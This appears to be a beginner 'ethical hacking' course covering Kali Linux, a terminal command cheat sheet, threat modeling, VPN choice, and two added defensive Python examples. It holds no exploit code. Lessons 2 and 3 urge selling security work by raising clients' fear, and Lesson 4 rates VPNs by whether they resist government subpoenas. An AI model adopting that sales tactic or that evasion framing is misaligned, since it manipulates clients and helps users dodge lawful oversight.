Ethical Hacking Course from KYAnonymous


Lesson 1: Introduction to Kali Linux 
 
Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It 
is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon 
Kearns of Offensive Security through the rewrite of BackTrack, their previous forensics Linux 
distribution. 
 
Kali Linux is preinstalled with numerous penetration-testing programs, including nmap (a port scanner), 
Wireshark (a packet analyzer), John the Ripper (a password cracker), Aircrack-ng (a software suite for 
penetration-testing wireless LANs), Burp suite and OWASP ZAP (both web application security 
scanners). Kali Linux can run natively when installed on a computer’s hard disk, can be booted from a 
live CD or live USB, or it can run within a virtual machine. It is a supported platform of the Metasploit 
Project’s Metasploit Framework, a tool for developing and executing security exploits. 
Introduction to Kali Linux

From the Kali website:

Kali Linux is an advanced Penetration Testing and Security Auditing Linux distribution.
Kali Linux Features 
 
Kali is a complete re-build of BackTrack Linux, adhering completely to Debian development standards. 
All-new infrastructure has been put in place, all tools were reviewed and packaged, and we use Git for our 
VCS. 
 
More than 300 penetration testing tools: After reviewing every tool that was included in BackTrack, we 
eliminated a great number of tools that either did not work or had other tools available that provided 
similar functionality. 
Free and always will be: Kali Linux, like its predecessor, is completely free and always will be. You will 
never, ever have to pay for Kali Linux. 
Open source Git tree: We are huge proponents of open source software and our development tree is 
available for all to see and all sources are available for those who wish to tweak and rebuild packages. 
FHS compliant: Kali has been developed to adhere to the Filesystem Hierarchy Standard, allowing all 
Linux users to easily locate binaries, support files, libraries, etc. 
Vast wireless device support: We have built Kali Linux to support as many wireless devices as we 
possibly can, allowing it to run properly on a wide variety of hardware and making it compatible with 
numerous USB and other wireless devices. 
Custom kernel patched for injection: As penetration testers, the development team often needs to do 
wireless assessments so our kernel has the latest injection patches included. 
Secure development environment: The Kali Linux team is made up of a small group of trusted individuals 
who can only commit packages and interact with the repositories while using multiple secure protocols. 
GPG signed packages and repos: All Kali packages are signed by each individual developer when they 
are built and committed and the repositories subsequently sign the packages as well. 
Multi-language: Although pentesting tools tend to be written in English, we have ensured that Kali has 
true multilingual support, allowing more users to operate in their native language and locate the tools they 
need for the job. 
Completely customizable: 
ARMEL and ARMHF support: Since ARM-based systems are becoming more and more prevalent and 
inexpensive, we knew that Kali’s ARM support would need to be as robust as we could manage, resulting 
in working installations for both ARMEL and ARMHF systems. Kali Linux has ARM repositories 
integrated with the mainline distribution so tools for ARM will be updated in conjunction with the rest of 
the distribution. Kali is currently available for the following ARM devices: 
- rk3306 mk/ss808 
- Raspberry Pi 
- ODROID U2/X2 
- Samsung Chromebook 
- EfikaMX 
- Beaglebone Black 
- CuBox 
- Galaxy Note 10.1 
 
.................. 
 
Okay class, it's important to realize that most of the tools in Kali are launched from a GUI (graphical user interface), unlike previous installations of BackTrack, which required terminal input.

Terminal is like the Windows command prompt, with one difference you will quickly notice: in Windows, file paths use the backslash

\

In the Linux environment, file paths use the forward slash

/

***Important***
File paths are case sensitive, and when launching a program you also have to type the extension.

Ex. Root/user/admin/torhammer.py

If you had the above program installed, typing the name with its ".py" extension would launch the program.

Another cool thing about Kali, and Linux in general, is that once you learn a programming language you can code your own programs in its "notepad" style text editor, save the file as something like "hacklikeaboss.py" (which saves it as a Python file), then right-click and change the advanced settings to mark the file as executable, and voila! Your very own custom program has been created.

Enough about Kali; I'm sure you're ready to get started on Lesson 2.
 
Lesson 2: Real World Applications for Kali, forming your own business, and an introduction to Terminal, the hacker's best friend.
 
Lesson 2: Real World Applications for Kali Linux 
 
Greetings class: 
Real world applications for Kali Linux are very diverse. Incorporating them into your repertoire as a sales pitch is crucial to forming a thriving business model that will generate revenue for you and your company.
Small business examples:
Every 9 seconds a personal computer is hacked. Thousands of people either own their own business or work from home. These are the businesses you will start with at first to build a reputation.
Stressing the importance of data security to the customer is an integral part of the sales pitch. Looking up articles about local businesses around your area, and even college databases, being breached can not only raise awareness but also raise the fear factor. Ever heard the saying that a little fear is healthy? Well, fear sells, and in today's day and age everyone is digital.
Some people run their business sites via WordPress, and even blog on them daily about events. This consumes a good portion of the client's time, and if someone were to gain access because of a faulty line of code in the site, the client could lose not only their investment but customers and customer data as well.
A Kali Linux application for this would be a tool called wpscan, which we will review later on; it scans the site for vulnerabilities, allowing you to report them to the site owner or admin.
It is illegal to scan without permission; always get permission.
Another tool to use would be nmap.
This tool scans for open ports on hosts on a network, such as a Wi-Fi network.
Open ports are like open doors that anyone with the right knowledge can walk through to reach things like customer data, and even credit card transaction information.
You will find when launching these programs via the drop-down menu that they open a sort of command prompt via a program called Terminal. Kali is already preconfigured to run with root access, so a tutorial on sudo isn't necessary.
Terminal accepts your commands and runs basically every function on Kali, and this is where you will spend most of your time.
Every time you start Kali, if it's a live disk and not a full install, I recommend opening a terminal first thing.
Then type
apt-get update
This refreshes the package lists from the repositories.
You can then install upgraded versions of the installed packages with
apt-get upgrade
Other commands are listed below.
System Info 
date – Show the current date and time 
cal – Show this month's calendar 
uptime – Show current uptime 
w – Display who is online 
whoami – Who you are logged in as 
finger user – Display information about user 
uname -a – Show kernel information 
cat /proc/cpuinfo – CPU information 
cat /proc/meminfo – Memory information
df -h – Show disk usage 
du – Show directory space usage 
free – Show memory and swap usage 
Keyboard Shortcuts 
Enter – Run the command 
Up Arrow – Show the previous command 
Ctrl + R – Allows you to type a part of the command you're looking for and finds it 
Ctrl + Z – Stops the current command, resume with fg in the foreground or bg in the background 
Ctrl + C – Halts the current command, cancel the current operation and/or start with a fresh new line 
Ctrl + L – Clear the screen 
command | less – Allows the scrolling of the bash command window using Shift + Up Arrow and Shift + Down Arrow
!! – Repeats the last command 
command !$ – Repeats the last argument of the previous command 
Esc + . (a period) – Insert the last argument of the previous command on the fly, which enables you to edit it 
before executing the command 
Ctrl + A – Return to the start of the command you're typing 
Ctrl + E – Go to the end of the command you're typing 
Ctrl + U – Cut everything before the cursor to a special clipboard, erases the whole line 
Ctrl + K – Cut everything after the cursor to a special clipboard 
Ctrl + Y – Paste from the special clipboard that Ctrl + U and Ctrl + K save their data to 
Ctrl + T – Swap the two characters before the cursor (you can actually use this to transport a character from 
the left to the right, try it!) 
Ctrl + W – Delete the word / argument left of the cursor in the current line 
Ctrl + D – Log out of current session, similar to exit 
Learn the Commands 
apropos subject – List manual pages for subject 
man -k keyword – Display man pages containing keyword 
man command – Show the manual for command 
man -t man | ps2pdf - > man.pdf – Make a pdf of a manual page 
which command – Show full path name of command 
time command – See how long a command takes 
whereis app – Show possible locations of app 
which app – Show which app will be run by default; it shows the full path 
Searching 
grep pattern files – Search for pattern in files 
grep -r pattern dir – Search recursively for pattern in dir 
command | grep pattern – Search for pattern in the output of command 
locate file – Find all instances of file 
find / -name filename – Starting with the root directory, look for the file called filename 
find / -name "*filename*" – Starting with the root directory, look for the file containing the string filename
locate filename – Find a file called filename using the locate command; this assumes you have already used 
the command updatedb (see next) 
updatedb – Create or update the database of files on all file systems attached to the Linux root directory 
which filename – Show the subdirectory containing the executable file called filename 
grep TextStringToFind /dir – Starting with the directory called dir, look for and list all files 
containing TextStringToFind 
File Permissions 
chmod octal file – Change the permissions of file to octal, which can be found separately for user, group, 
and world by adding: 4 – read (r),2 – write (w), 1 – execute (x) 
Examples: 
chmod 777 – read, write, execute for all 
chmod 755 – rwx for owner, rx for group and world 
For more options, see man chmod. 
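As an added example for this section (it is not part of the original course material), the Python script below implements the 4/2/1 addition described above in both directions, and goes one step further than the text: it also decodes the setuid, setgid and sticky bits and audits a constructed `ls -l` listing for the settings a security reviewer would question (world-writable files, setuid binaries, private keys readable by others). The sample listing is made up for the example.

```python
"""Decode and audit Unix file permission modes (added example, not course code)."""
from __future__ import annotations

# Constructed sample output in `ls -l` format (not a real listing).
SAMPLE_LISTING = """\
-rwxr-xr-x 1 root root  12345 Jan  1 12:00 /usr/local/bin/scan.sh
-rw-rw-rw- 1 root root    512 Jan  1 12:00 /etc/app/config.ini
-rwsr-xr-x 1 root root  54256 Jan  1 12:00 /usr/bin/passwd
-rw------- 1 root root   1675 Jan  1 12:00 /root/.ssh/id_rsa
drwxrwxrwt 2 root root   4096 Jan  1 12:00 /tmp
"""

PERM_BITS = {"r": 4, "w": 2, "x": 1}  # the 4/2/1 scheme from the chmod section


def symbolic_to_octal(mode: str) -> str:
    """Convert a 10-character ls mode string (e.g. '-rwxr-xr-x') to octal.

    Returns a four-digit string: special bits (setuid 4, setgid 2, sticky 1)
    followed by the user, group and other digits built by adding 4, 2 and 1.
    """
    if len(mode) != 10:
        raise ValueError(f"expected 10-character mode string, got {mode!r}")
    perms = mode[1:]
    special = 0
    digits = []
    for i, triple in enumerate((perms[0:3], perms[3:6], perms[6:9])):
        value = 0
        for ch in triple:
            if ch in PERM_BITS:
                value += PERM_BITS[ch]
            elif ch in "sStT":
                # setuid/setgid/sticky occupy the execute slot: lowercase
                # means execute is also set, uppercase means it is not.
                special += (4, 2, 1)[i]
                if ch in "st":
                    value += 1
        digits.append(value)
    return f"{special}{digits[0]}{digits[1]}{digits[2]}"


def octal_to_symbolic(octal: str, is_dir: bool = False) -> str:
    """Inverse of symbolic_to_octal: '755' or '4755' -> '-rwxr-xr-x' style."""
    octal = octal.zfill(4)
    special, *rest = (int(d) for d in octal)
    out = "d" if is_dir else "-"
    for i, value in enumerate(rest):
        out += "r" if value & 4 else "-"
        out += "w" if value & 2 else "-"
        has_x = bool(value & 1)
        if special & (4, 2, 1)[i]:
            out += ("s", "s", "t")[i] if has_x else ("S", "S", "T")[i]
        else:
            out += "x" if has_x else "-"
    return out


def audit_listing(listing: str) -> list[tuple[str, str, list[str]]]:
    """Return (path, octal, findings) for each entry of an `ls -l` listing."""
    results = []
    for line in listing.splitlines():
        fields = line.split(None, 8)  # mode links owner group size mon day time name
        if len(fields) < 9:
            continue
        mode, path = fields[0], fields[8]
        octal = symbolic_to_octal(mode)
        special, _user, group, other = (int(d) for d in octal)
        findings = []
        if other & 2 and not (mode[0] == "d" and special & 1):
            # World-writable file, or world-writable directory without the sticky bit
            findings.append("world-writable")
        if special & 4:
            findings.append("setuid")
        if special & 2:
            findings.append("setgid")
        if path.endswith(("id_rsa", "id_ed25519")) and (group or other):
            findings.append("private key readable by others")
        results.append((path, octal, findings))
    return results


if __name__ == "__main__":
    for path, octal, findings in audit_listing(SAMPLE_LISTING):
        print(f"{octal} {path} {', '.join(findings) or 'ok'}")
```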
File Commands 
ls – Directory listing 
ls -l – List files in current directory using long format 
ls -laC – List all files in current directory in long format and display in columns 
ls -F – List files in current directory and indicate the file type 
ls -al – Formatted listing with hidden files 
cd dir – Change directory to dir 
cd – Change to home 
mkdir dir – Create a directory dir 
pwd – Show current directory 
rm name – Remove a file or directory called name 
rm -r dir – Delete directory dir 
rm -f file – Force remove file 
rm -rf dir – Force remove an entire directory dir and all its included files and subdirectories (use with extreme caution)
cp file1 file2 – Copy file1 to file2 
cp -r dir1 dir2 – Copy dir1 to dir2; create dir2 if it doesn't exist 
cp file /home/dirname – Copy the filename called file to the /home/dirname directory 
mv file /home/dirname – Move the file called filename to the /home/dirname directory 
mv file1 file2 – Rename or move file1 to file2; if file2 is an existing directory, moves file1 into directory file2 
ln -s file link – Create symbolic link link to file 
touch file – Create or update file 
cat > file – Places standard input into file 
cat file – Display the file called file 
more file – Display the file called file one page at a time, proceed to next page using the spacebar 
head file – Output the first 10 lines of file 
head -20 file – Display the first 20 lines of the file called file 
tail file – Output the last 10 lines of file 
tail -20 file – Display the last 20 lines of the file called file 
tail -f file – Output the contents of file as it grows, starting with the last 10 lines 
Compression 
tar cf file.tar files – Create a tar named file.tar containing files 
tar xf file.tar – Extract the files from file.tar 
tar czf file.tar.gz files – Create a tar with Gzip compression 
tar xzf file.tar.gz – Extract a tar using Gzip 
tar cjf file.tar.bz2 files – Create a tar with Bzip2 compression
tar xjf file.tar.bz2 – Extract a tar using Bzip2 
gzip file – Compresses file and renames it to file.gz 
gzip -d file.gz – Decompresses file.gz back to file 
Printing 
/etc/rc.d/init.d/lpd start – Start the print daemon 
/etc/rc.d/init.d/lpd stop – Stop the print daemon 
/etc/rc.d/init.d/lpd status – Display status of the print daemon 
lpq – Display jobs in print queue 
lprm – Remove jobs from queue 
lpr – Print a file 
lpc – Printer control tool 
man subject | lpr – Print the manual page called subject as plain text 
man -t subject | lpr – Print the manual page called subject as Postscript output 
printtool – Start X printer setup interface 
Network 
ifconfig – List IP addresses for all devices on the local machine 
iwconfig – Used to set the parameters of the network interface which are specific to the wireless operation (for 
example: the frequency) 
iwlist – used to display some additional information from a wireless network interface that is not displayed 
by iwconfig 
ping host – Ping host and output results 
whois domain – Get whois information for domain 
dig domain – Get DNS information for domain 
dig -x host – Reverse lookup host 
wget file – Download file 
wget -c file – Continue a stopped download 
SSH 
ssh user@host – Connect to host as user 
ssh -p port user@host – Connect to host on port port as user 
ssh-copy-id user@host – Add your key to host for user to enable a keyed or passwordless login 
User Administration 
adduser accountname – Create a new user called accountname
passwd accountname – Give accountname a new password 
su – Log in as superuser from current login 
exit – Stop being superuser and revert to normal user 
Process Management 
ps – Display your currently active processes 
top – Display all running processes 
kill pid – Kill process id pid 
killall proc – Kill all processes named proc (use with extreme caution) 
bg – Lists stopped or background jobs; resume a stopped job in the background 
fg – Brings the most recent job to foreground 
fg n – Brings job n to the foreground 
Installation from source 
./configure 
make 
make install 
dpkg -i pkg.deb – install a DEB package (Debian / Ubuntu / Linux Mint) 
rpm -Uvh pkg.rpm – install a RPM package (Red Hat / Fedora) 
Stopping & Starting 
shutdown -h now – Shutdown the system now and do not reboot 
halt – Stop all processes - same as above 
shutdown -r 5 – Shutdown the system in 5 minutes and reboot 
shutdown -r now – Shutdown the system now and reboot 
reboot – Stop all processes and then reboot - same as above 
startx – Start the X system 
 
Lesson 3: Threat assessment and how to sell it 
 
Good morning class, 
I hope you have had time to experiment with terminal commands and familiarize yourselves with the file structure of Kali Linux.
Fear sells, 100 percent of the time. It's this fear that drives us to protect ourselves against the unknown. It's this fear that tells us money isn't a factor when it comes to protecting our investments. So, in short, today's lesson will be on threat assessment.
Now for a little roleplay.
Company XYZ is a Fortune 500 company that buys and trades domains on the market, processes credit card and bank transactions, stores customer information on encrypted servers, and has an option for member sign-up. You ask them and they say they are running SQL databases.
How would you approach the company to sell your business?
Respond to this email with your answer.
My answer will be included in Lesson 4.
Now on threat assessment, 
Modeling 
There is no single solution for keeping yourself safe online. Digital security isn’t about which tools you use; 
rather, it’s about understanding the threats you face and how you can counter those threats. To become more 
secure, you must determine what you need to protect, and whom you need to protect it from. Threats can 
change depending on where you’re located, what you’re doing, and whom you’re working with. Therefore, in 
order to determine what solutions will be best for you, you should conduct a threat modeling assessment. 
When conducting an assessment, there are five main questions you should ask yourself: 
- What do you want to protect?
- Who do you want to protect it from?
- How likely is it that you will need to protect it?
- How bad are the consequences if you fail?
- How much trouble are you willing to go through in order to try to prevent those?
When we talk about the first question, we often refer to assets, or the things that you are trying to protect. 
An asset is something you value and want to protect. When we are talking about digital security, the assets in
question are usually information. For example, your emails, contact lists, instant messages, and files are all 
assets. Your devices are also assets. 
Write down a list of data that you keep, where it’s kept, who has access to it, and what stops others 
from accessing it. 
In order to answer the second question, “Who do you want to protect it from,” it’s important to understand who 
might want to target you or your information, or who is your adversary. An adversary is any person or entity that 
poses a threat against an asset or assets. Examples of potential adversaries are your boss, your government, 
or a hacker on a public network. 
Make a list of who might want to get ahold of your data or communications. It might be an individual, a 
government agency, or a corporation. 
A threat is something bad that can happen to an asset. There are numerous ways that an adversary can 
threaten your data. For example, an adversary can read your private communications as they pass through the 
network, or they can delete or corrupt your data. An adversary could also disable your access to your own data. 
The motives of adversaries differ widely, as do their attacks. A government trying to prevent the spread of a 
video showing police violence may be content to simply delete or reduce the availability of that video, whereas 
a political opponent may wish to gain access to secret content and publish it without you knowing. 
Write down what your adversary might want to do with your private data. 
The capability of your attacker is also an important thing to think about. For example, your mobile phone 
provider has access to all of your phone records and therefore has the capability to use that data against you. 
A hacker on an open Wi-Fi network can access your unencrypted communications. Your government might 
have stronger capabilities. 
A final thing to consider is risk. Risk is the likelihood that a particular threat against a particular asset will 
actually occur, and goes hand-in-hand with capability. While your mobile phone provider has the capability to 
access all of your data, the risk of them posting your private data online to harm your reputation is low. 
It is important to distinguish between threats and risks. While a threat is a bad thing that can happen, risk is the 
likelihood that the threat will occur. For instance, there is a threat that your building might collapse, but the risk 
of this happening is far greater in San Francisco (where earthquakes are common) than in Stockholm (where 
they are not). 
Conducting a risk analysis is both a personal and a subjective process; not everyone has the same priorities or 
views threats in the same way. Many people find certain threats unacceptable no matter what the risk, because 
the mere presence of the threat at any likelihood is not worth the cost. In other cases, people disregard high 
risks because they don't view the threat as a problem. 
In a military context, for example, it might be preferable for an asset to be destroyed than for it to fall into 
enemy hands. Conversely, in many civilian contexts, it's more important for an asset such as email service to 
be available than confidential. 
Now, let’s practice threat modeling. 
If you want to keep your house and possessions safe, here are a few questions you might ask: 
- Should I lock my door?
- What kind of lock or locks should I invest in?
- Do I need a more advanced security system?
- What are the assets in this scenario? The privacy of my home; the items inside my home.
- What is the threat? Someone could break in.
- What is the actual risk of someone breaking in? Is it likely?
Once you have asked yourself these questions, you are in a position to assess what measures to take. If your 
possessions are valuable, but the risk of a break-in is low, then you probably won’t want to invest too much 
money in a lock. On the other hand, if the risk is high, you’ll want to get the best locks on the market, and 
perhaps even add a security system. 
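The worksheet below is an added example (not part of the original course text) that turns the five questions of this lesson into a small Python threat-modeling tool: it records assets and adversaries, scores each threat from its likelihood and consequences, honours the point that some threats are unacceptable at any likelihood, and ranks what to protect first. Capping likelihood by the adversary's capability is this example's own assumption, and all entries in the sample worksheet are constructed.

```python
"""Threat-modeling worksheet for the five questions (added example, not course code)."""
from __future__ import annotations

from dataclasses import dataclass


@dataclass
class Asset:
    """Question 1: what do you want to protect?"""
    name: str
    location: str               # where it is kept
    who_has_access: list[str]   # who can reach it today
    current_protection: str     # what stops others from accessing it


@dataclass
class Adversary:
    """Question 2: who do you want to protect it from?"""
    name: str
    capability: int  # 1 (low) .. 5 (high): what the adversary can actually do


@dataclass
class Threat:
    """Something bad an adversary could do to an asset."""
    asset: Asset
    adversary: Adversary
    description: str            # what the adversary might do with the data
    likelihood: int             # Question 3: 1 (rare) .. 5 (near certain)
    consequence: int            # Question 4: 1 (minor) .. 5 (catastrophic)
    unacceptable: bool = False  # intolerable regardless of likelihood

    def risk(self) -> int:
        """Risk score: effective likelihood times consequence.

        Assumption of this example: an adversary cannot realise a threat
        beyond its capability, so likelihood is capped at capability.
        """
        return min(self.likelihood, self.adversary.capability) * self.consequence


def rank_threats(threats: list[Threat]) -> list[Threat]:
    """Unacceptable threats first, then highest risk first."""
    return sorted(threats, key=lambda t: (not t.unacceptable, -t.risk()))


def recommend_effort(threat: Threat) -> str:
    """Question 5: how much trouble to go to (the house-lock analogy)."""
    if threat.unacceptable:
        return "eliminate the threat or remove the asset"
    score = threat.risk()
    if score >= 15:
        return "invest heavily (best available controls plus monitoring)"
    if score >= 8:
        return "apply standard controls"
    return "accept the risk; do not over-invest"


# Constructed worksheet entries for a small consultancy (sample data only).
CLIENT_DB = Asset("client database", "laptop", ["me"], "login password")
FOOTAGE = Asset("source footage", "laptop", ["me"], "login password")
THIEF = Adversary("opportunistic thief", capability=2)
WIFI_SNOOP = Adversary("eavesdropper on open Wi-Fi", capability=3)
PROVIDER = Adversary("mobile phone provider", capability=5)
GOVERNMENT = Adversary("hostile government agency", capability=5)

SAMPLE_THREATS = [
    Threat(CLIENT_DB, WIFI_SNOOP, "read unencrypted sync traffic in a cafe",
           likelihood=4, consequence=4),
    Threat(CLIENT_DB, PROVIDER, "publish call records to damage reputation",
           likelihood=1, consequence=5),
    Threat(CLIENT_DB, THIEF, "steal the laptop from a parked car",
           likelihood=2, consequence=3),
    Threat(FOOTAGE, GOVERNMENT, "delete or suppress the footage",
           likelihood=3, consequence=5, unacceptable=True),
]


if __name__ == "__main__":
    for t in rank_threats(SAMPLE_THREATS):
        flag = " (unacceptable)" if t.unacceptable else ""
        print(f"risk={t.risk():>2}{flag} {t.asset.name} <- {t.adversary.name}: "
              f"{t.description} -> {recommend_effort(t)}")
```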
 
Lesson 4: Opsec, VPN, Tor. 
 
Opsec stands for "operational security" and is a term coined by the special forces in the United States military. When it comes to hacking, Opsec is essential so as not to let your opponent know that you are on to them. If you are hired to test the security already in place, it is obvious that you would need to learn ways to mask your attacks.
Virtual Private Networks or VPNs: 
What Is A VPN? 
A VPN (Virtual Private Network) provides a secure way of connecting through a public network (such as the 
Internet) to a remote network/location. This remote network is typically a private network, such as a workplace 
or home network, or one provided by a commercial VPN service. 
A VPN can be thought to create a "tunnel" through the public network to your private network at the other end. 
All network traffic through this tunnel is encrypted to ensure it is kept secure and private. 
What Does A VPN Let Me Do? 
A VPN allows you to do a number of things you wouldn't otherwise be able to do connected to a standard 
network. This includes: 
Network Security & Privacy: All network traffic through your VPN connection is kept secure. This allows you 
to use public networks (such as at hotels, conferences, coffee shops, etc.) and wireless networks knowing your 
network traffic is kept safe and secure. Otherwise it is relatively easy for other people to view your network 
traffic, such as see what you are viewing, steal your information and login details, etc. 
Access Your Workplace Remotely: You can connect to your workplace's VPN and have access as if you 
were physically in the office. You can then do things like access file servers, computers, databases, email, 
internal webpages, and other services you might not have access to outside of your work network. 
Access Your Home Network: Connecting back home using a VPN allows you to access your computers remotely. Access files on your computer, view iTunes shares, take remote control of your computer, and access other services.
Access Location Restricted Content: By connecting to a VPN server in another location you can make it 
appear to websites using geolocation that you are physically in the correct location for access. So when you're 
travelling overseas you can still view websites you would normally use at home, such as television, movie and 
music streaming websites. 
Bypass Restrictive Networks: Some networks may restrict access to the web services that can be accessed, meaning that many applications like VOIP, instant messaging, video chat, and games will not work. However, using a VPN you can tunnel through such restrictions and allow all of your network applications to work. Viscosity even allows you to tunnel through HTTP or SOCKS proxies to establish your VPN connection.
Escape Censorship: VPNs allow you to bypass restrictive censorship and access websites and services that 
would otherwise be blocked. Some countries impose censorship on Internet access while in that country, and a 
VPN provides a way to still maintain access to the services you would normally use. 
Why Should I Use A VPN? 
Even if you have no desire to be able to access a private network remotely, a VPN is vital to ensure the 
security and privacy of your network traffic. 
Public networks, and in particular public wireless networks, provide an easy way for hackers and malicious 
users to listen in ("sniff") on your network usage. This may allow them to see what web pages you are viewing, 
steal username and passwords, steal session information to be able to log into sites as you, and extract other 
private data. In addition, skilled hackers may perform a "man in the middle" attack. This allows them to not only 
monitor in depth your network traffic, but also alter your traffic or inject their own in an attempt to fool a user into 
revealing important data. 
Using a VPN protects you from such attacks, as your network traffic is authenticated and encrypted, making it 
secure and private. 
How Does A VPN Work? 
A typical VPN consists of two components: the VPN client and the VPN server. 
A VPN client is the software that allows a user to connect their computer to the VPN server and establish the 
VPN connection. It is installed on the user's computer and communicates with the VPN server to create a 
secure link for the user's network traffic. The VPN Client is what the end user uses to control their VPN 
connection. Viscosity performs the duties of a VPN client. 
A VPN server is set up at the location users want to connect to, such as at a workplace or at home. A VPN server is usually configured and maintained by IT staff; however, home users often set up their own personal VPN server at home or at a remote location as well. End users rarely have to interact with the VPN server. A VPN server will also perform authentication to ensure only registered users can connect to the VPN.
All network traffic through the tunnel created between the VPN client and the VPN server is encrypted to keep it 
private and secure. 
What Is OpenVPN? 
OpenVPN is a popular VPN protocol that is based on SSL/TLS encryption. Like IPSec and PPTP, OpenVPN 
handles the connection between the VPN client and server. OpenVPN is rapidly gaining in popularity thanks to 
its high level of security, customizability, and compatibility with most network environments. 
VPN Service Providers 
There are many companies that specialize in providing a commercial VPN service. These companies are 
known as "VPN Service Providers". VPN Service Providers often have servers in multiple countries, allowing 
you to not only get the security and privacy benefits on a VPN, but also making it easy to access websites that 
restrict access to certain countries. Most VPN Service Providers charge a small monthly or yearly fee for access
to their servers, however there are also a number of free service providers. 
The key to choosing a quality VPN comes down to two factors:
1) Do they cooperate with United States government subpoenas?
2) Do they keep logs? (You don't want logs.)
TorGuard 
TorGuard's claim to fame is that they offer specific types of servers for different activities. That gives you the 
ability to connect to torrent-friendly services if you need to download something, encryption and anonymity-
friendly servers if you just need a little privacy and security, and so on. They're also one of the few VPN service 
providers to take DNS leaking seriously, and they even offer their own test to make sure that your VPN—even 
if you don't use them—isn't leaking DNS and thus information you thought was secure. Depending on your 
usage habits and patterns, TorGuard has different plans for you. For our purposes though, their full VPN 
service will set you back $10/mo or $60/yr, and they have less expensive plans if you just want an anonymous 
proxy or a torrent proxy. Their full VPN service however features over 200 exit servers in 18 countries, no 
logging or data retention of any kind, and their network is set up in a way that they actually have no information 
to collect on their user activities—they don't know what you're doing or when you're connected. They delivered 
a really great response to Torrentfreak's questions that's well worth a read for more info. They also support 
multiple connectivity protocols, support for virtually every desktop and mobile OS, and even offer their 
customers encrypted, offshore email service if you want to take advantage. 
Those of you who praised TorGuard in the call for contenders thread noted that they have "Stealth" VPN 
servers to protect you against deep packet inspection (a technique used to capture and systematically decrypt 
or inspect encrypted data, usually used by corporate networks, university networks, or specific "agencies.") You 
also noted that they support OpenVPN, help you get connected via your home network, and have great 
customer service. 
IPVanish VPN 
IPVanish takes an interesting approach to privacy and security. They use shared IP addresses, so when they say no one has any idea what you're doing when you're connected, they mean it. That doesn't mean they're compromising security though—they have over 14,000 IPs to share on over a hundred exit servers in 47 different countries. You can choose where you'd prefer to connect, which again is perfect for getting around location restrictions, and their encryption makes sure your traffic is safe from prying eyes. They support OS X, Windows, and Ubuntu (although it wouldn't be too hard to stretch that to other distributions), along with iOS and Android, and they offer configuration utilities so you can set your home router to connect to them as well. They feature multiple connection protocols, don't discriminate against traffic types or port usage, don't monitor your activities, and only log a few things. Torrentfreak gave them the nod as well. Accounts with IPVanish are $10/mo or $78/yr, and you can connect two devices at once (as long as they're using different protocols).
IPVanish earned high praise in the call for contenders thread for its speed while connected. How they manage 
to do it is impressive, but the service manages to hold itself to a high standard of privacy and security while 
giving you breakneck speeds that you may not be accustomed to with a VPN. The service proudly notes that 
they're happy with you streaming video or music while you're connected to get around pesky content blocks, 
especially if you're an expat who's currently abroad but wishes they could see their favorite TV shows back 
home or make use of their streaming music subscription. 
CyberGhost VPN 
CyberGhost has been around for a long time, and they made a great showing in the call for contenders thread. Like any good, trustworthy VPN provider, they both encrypt all of the data that passes through your connection and anonymize your location. They offer free and paid subscription plans, so if you just need a little security on the go, you may be able to get away with a free account. The service went through a massive overhaul about a year ago, where they removed traffic and bandwidth restrictions for free accounts and improved security from the ground up. CyberGhost doesn't log any traffic, and they don't monitor what you're doing while you're connected. They do retain some information, but not much. They offer your choice of exit servers in 23 different countries (free users can pick from one of 14, still impressive for a free service), and you can see server status at any time.
 
Their clients are easy to use, support virtually every mobile and desktop platform, and they don't discriminate against traffic types, protocols, or IP addresses (in fact, they just donated 10,000 licenses to users in Turkey to get around their location blocks).
The only major difference between free and pro CyberGhost accounts is that free accounts disconnect after 3 hours and are limited to the official client, while pro accounts can use other connection protocols and have way more servers in more countries to choose from. You'll pay $7/mo or $40/yr for a premium account, but if you need more than one device connected at any given time, you'll need to step up to Premium Plus, at $11/mo or $70/yr. Those of you who praised the service noted their great connection speeds and wealth of servers to choose from (even for free users). Read more in the nomination thread here.
Do-It-Yourself 
Of course, no list of great options would be complete without the DIY approach. If you don't need exit servers in different countries, and your primary need is to encrypt and secure your data when you're away from home, you can roll your own VPN with OpenVPN or a number of other free, open-source tools. Many of the best routers on the market support OpenVPN out of the box, and even if they don't, the DD-WRT or Tomato firmwares do, so if you can install those on your router, you'll be all set. The beauty of a home-rolled VPN is that you get to set the level of encryption, and you get complete control over who connects, who has access to what parts of your home network, and where your data goes from there.
Of course, this setup is best for people traveling who want to encrypt their data while they're on the go, but with a couple of friends, it's easy to set up a mesh network that would get you around content restrictions and port blocks. Similarly, advanced users can fire up a VPN on their preferred host or VPS provider and keep it running there, connecting to it when necessary. The sky's the limit with the DIY option; it just takes the skill and know-how to do it, and some compromise on the level of features and tools you get.
We have more than a few honorable mentions this week, including one of my personal favorites, Hideman 
VPN, for their cross-platform, mobile-friendly, no-logging VPN service—complete with free VPN options for 
people just looking for a little security on the go without shelling out for a premium service. Also noteworthy are 
the great people over at Tunnelbear, who are constantly working to improve and update their service to help 
you get around regional restrictions and blocks—and recently unveiled a browser add-on to tunnel some 
services but not others, giving you even more control over your connection. 
We'll also give the nod to AirVPN, a popular pick that packs in way more features than you might possibly 
need. You can forward remote ports, pick and choose exit services in multiple countries, and even generate an 
OpenVPN config through their wizard to connect your home network to their service all the time—oh, and they 
don't log, don't discriminate against protocols, and they have no idea when you're connected. If you're looking 
to walk the line between a truly DIY option and a VPN that you roll at home, configure, and then connect to 
externally, they're worth a look. 
We should also highlight VyprVPN, which was a really tough call. VyprVPN is owned by the same company that owns Giganews, the Usenet service provider. You can use VyprVPN as a stand-alone VPN client, but you'll sign up for Giganews when you get it. They did very well in the call for contenders thread—although many of their votes were from first-time accounts—and they certainly talk the talk on privacy issues. They have multiple exit servers in multiple countries, strong encryption, and they're improving their service all the time. However, they have a history of logging user data, sometimes a lot of user data, and at the very least log user sessions and data for troubleshooting, acceptable use issues, and more for up to 90 days. That's not an issue if you don't care about logging, but they were cagey with Torrentfreak back in 2011 on the topic, cagey with me when I last spoke to a rep from the company, and this Reddit thread is rather illuminating as well. Still, there are signs that things may be changing with VyprVPN. The feature set and the face of the company both look good, and they combine Usenet with VPN services, which is great, but we don't feel comfortable calling them one of the best if we can't verify their commitment to your privacy and anonymity as well as the security of your data.
